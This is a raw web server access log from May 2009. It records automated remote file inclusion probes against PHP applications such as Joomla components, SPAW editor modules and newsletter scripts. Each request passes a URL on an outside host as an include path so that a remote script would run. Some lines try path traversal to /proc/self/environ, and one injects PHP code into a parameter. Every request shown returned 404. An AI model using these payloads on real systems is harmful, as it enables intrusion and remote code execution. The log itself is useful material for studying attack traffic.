213.251.169.156 - - [17/May/2009:12:08:48 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://r3load3d.oltreirc.net/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
213.251.169.156 - - [17/May/2009:12:08:48 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://r3load3d.oltreirc.net/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:09:21 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:09:21 -0500] "GET /logs//include/write.php?dir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:09:21 -0500] "GET //include/write.php?dir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:12:09:23 -0500] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://163.26.12.232/gambar.jpg??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:12:09:23 -0500] "GET /logs/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://163.26.12.232/gambar.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.251.169.156 - - [17/May/2009:12:09:23 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://r3load3d.oltreirc.net/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:09:23 -0500] "GET //newsletter/maillist/inc/initdb.php?absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:09:23 -0500] "GET /logs//newsletter/maillist/inc/initdb.php?absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:09:23 -0500] "GET /logs/access_log.1238112000//newsletter/maillist/inc/initdb.php?absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.251.169.156 - - [17/May/2009:12:09:23 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://r3load3d.oltreirc.net/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
213.251.169.156 - - [17/May/2009:12:09:23 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://r3load3d.oltreirc.net/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:09:24 -0500] "GET /logs/access_log.1240617600//newsletter/maillist/inc/initdb.php?absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:12:09:25 -0500] "GET /logs/access_log.1233014400/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://163.26.12.232/gambar.jpg??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:09:33 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:10:27 -0500] "GET /logs/access_log.1238112000//newsletter/maillist/inc/initdb.php?absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:10:27 -0500] "GET /logs//newsletter/maillist/inc/initdb.php?absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:10:27 -0500] "GET /logs/access_log.1240617600//newsletter/maillist/inc/initdb.php?absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:10:27 -0500] "GET //newsletter/maillist/inc/initdb.php?absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:10:38 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:10:38 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:10:38 -0500] "GET /logs/access_log.1236643200//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:10:44 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:10:44 -0500] "GET /logs/access_log.1236643200//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:10:44 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:10:58 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://h1.ripway.com/lisna212/sayangku.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
65.98.59.178 - - [17/May/2009:12:10:58 -0500] "GET //include/bbs.lib.inc.php?site_path=http://h1.ripway.com/lisna212/sayangku.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
217.18.76.16 - - [17/May/2009:12:11:02 -0500] "GET /logs/access_log.1236988800//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:11:06 -0500] "GET /logs/access_log.1236988800//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:12:11:29 -0500] "GET /logs/access_log.1233014400/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://163.26.12.232/gambar.jpg??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:12:11:29 -0500] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://163.26.12.232/gambar.jpg??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:12:11:29 -0500] "GET /logs/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://163.26.12.232/gambar.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:12:11:51 -0500] "GET /logs/access_log.1236643200//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:12:11:51 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:12:11:51 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:13:47 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:13:47 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:13:47 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:14:13 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:14:13 -0500] "GET /logs/access_log.1238716800//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:14:13 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:14:13 -0500] "GET /logs/access_log.1237939200//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
201.134.110.45 - - [17/May/2009:12:15:12 -0500] "GET /logs//newsletter/maillist/inc/initdb.php?absolute_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
201.134.110.45 - - [17/May/2009:12:15:12 -0500] "GET //newsletter/maillist/inc/initdb.php?absolute_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
66.118.156.242 - - [17/May/2009:12:16:21 -0500] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.118.156.242 - - [17/May/2009:12:16:21 -0500] "GET /logs/access_log.1233532800//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.118.156.242 - - [17/May/2009:12:16:21 -0500] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:16:28 -0500] "GET /logs/access_log.1238716800//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:16:28 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:16:28 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:16:29 -0500] "GET /logs/access_log.1237939200//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:16:54 -0500] "GET //include/bbs.lib.inc.php?site_path=http://h1.ripway.com/lisna212/bbc.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.98.59.178 - - [17/May/2009:12:16:54 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://h1.ripway.com/lisna212/bbc.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.150.79.146 - - [17/May/2009:12:16:55 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:16:55 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:16:55 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:12:16:56 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://h1.ripway.com/lisna212/bbc.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.150.79.146 - - [17/May/2009:12:17:07 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:17:07 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:17:07 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:17:46 -0500] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:17:46 -0500] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.18.76.16 - - [17/May/2009:12:17:46 -0500] "GET /logs/access_log.1239667200//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:12:17:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
77.221.130.2 - - [17/May/2009:12:17:48 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
77.221.130.2 - - [17/May/2009:12:17:49 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [17/May/2009:12:17:49 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [17/May/2009:12:17:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 301 "-""XXXXXX"
77.221.130.2 - - [17/May/2009:12:17:49 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 306 "-""XXXXXX"
77.221.130.2 - - [17/May/2009:12:17:49 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""XXXXXX"
77.221.130.2 - - [17/May/2009:12:17:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""XXXXXX"
65.98.59.178 - - [17/May/2009:12:18:10 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://h1.ripway.com/lisna212/bbc.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
124.217.216.86 - - [17/May/2009:12:19:36 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
124.217.216.86 - - [17/May/2009:12:19:36 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
124.217.216.86 - - [17/May/2009:12:19:36 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:21:08 -0500] "GET //includes/class_item.php?fileExtension=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:21:08 -0500] "GET /logs//includes/class_item.php?fileExtension=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:21:08 -0500] "GET /logs/access_log.1233273600//includes/class_item.php?fileExtension=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.59.21.101 - - [17/May/2009:12:21:08 -0500] "GET /logs/access_log.1234656000//includes/class_item.php?fileExtension=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:22:00 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:22:05 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:22:08 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:22:20 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:22:20 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:22:20 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
189.156.21.56 - - [17/May/2009:12:23:53 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tugaspeed.info/idpriv8.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
189.156.21.56 - - [17/May/2009:12:23:53 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://tugaspeed.info/idpriv8.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
70.86.169.162 - - [17/May/2009:12:25:37 -0500] "GET /logs/access_log.1236643200/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://163.26.12.232/gambar.jpg??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:12:26:31 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:26:33 -0500] "GET /logs//includes/class_item.php?fileExtension=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:26:33 -0500] "GET /logs/access_log.1234656000//includes/class_item.php?fileExtension=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:26:33 -0500] "GET //includes/class_item.php?fileExtension=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:26:33 -0500] "GET /logs/access_log.1233273600//includes/class_item.php?fileExtension=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:26:34 -0500] "GET /logs/access_log.1234656000//includes/class_item.php?fileExtension=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:26:34 -0500] "GET /logs//includes/class_item.php?fileExtension=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:26:34 -0500] "GET //includes/class_item.php?fileExtension=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:12:26:34 -0500] "GET /logs/access_log.1233273600//includes/class_item.php?fileExtension=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:12:27:27 -0500] "GET //poll/poll_ssi.php?include_path=http://yoursupplements4you.com/wp-content/themes/bluebook/images/swift.gif???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:12:27:27 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://yoursupplements4you.com/wp-content/themes/bluebook/images/swift.gif???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:12:27:27 -0500] "GET /logs/access_log.1240185600//poll/poll_ssi.php?include_path=http://yoursupplements4you.com/wp-content/themes/bluebook/images/swift.gif???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:12:27:29 -0500] "GET /logs/access_log.1238457600//poll/poll_ssi.php?include_path=http://yoursupplements4you.com/wp-content/themes/bluebook/images/swift.gif???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:27:49 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:27:49 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:27:49 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:27:52 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:27:52 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:27:53 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:27:55 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:12:27:57 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:12:29:38 -0500] "GET /logs/access_log.1236643200/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://163.26.12.232/gambar.jpg??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.78.76.70 - - [17/May/2009:12:31:01 -0500] "GET //poll/poll_ssi.php?include_path=http://yoursupplements4you.com/wp-content/themes/bluebook/images/swift.gif???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
195.78.76.70 - - [17/May/2009:12:31:01 -0500] "GET /logs/access_log.1240185600//poll/poll_ssi.php?include_path=http://yoursupplements4you.com/wp-content/themes/bluebook/images/swift.gif???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.78.76.70 - - [17/May/2009:12:31:01 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://yoursupplements4you.com/wp-content/themes/bluebook/images/swift.gif???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
195.78.76.70 - - [17/May/2009:12:31:03 -0500] "GET /logs/access_log.1238457600//poll/poll_ssi.php?include_path=http://yoursupplements4you.com/wp-content/themes/bluebook/images/swift.gif???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:32:25 -0500] "GET //errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:32:30 -0500] "GET /logs//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:32:35 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:12:32:35 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
